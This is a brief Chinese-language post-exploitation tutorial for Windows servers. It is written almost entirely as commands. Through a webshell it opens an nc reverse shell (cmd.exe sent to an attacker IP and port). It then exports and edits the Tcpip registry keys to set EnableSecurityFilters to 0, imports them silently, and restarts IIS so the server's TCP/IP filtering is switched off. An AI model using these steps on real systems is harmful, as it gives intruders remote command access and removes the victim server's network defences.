1.用NC反弹得到一个shell
本机监听 NC -l -p 32
WEBSHELL运行:
x:xxxserv-u.exe "x:xxx c.exe -e cmd.exe *.*.*.* port"
得到一个shell
2.CMD下导出注册表文件
C:>regedit -e x:xxx1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001Ser
vicesTcpip
C:>regedit -e x:xxx2.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip
C:>regedit -e x:xxx3.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
修改各文件 EnableSecurityFilters 处
将最后的1改为0
3.将注册表文件导入
x:xxx>regedit -s 1.reg
x:xxx>regedit -s 2.reg
x:xxx>regedit -s 3.reg
-S 为无提示
重启命令 iisreset /reboot
完成TCP/IP筛选限制
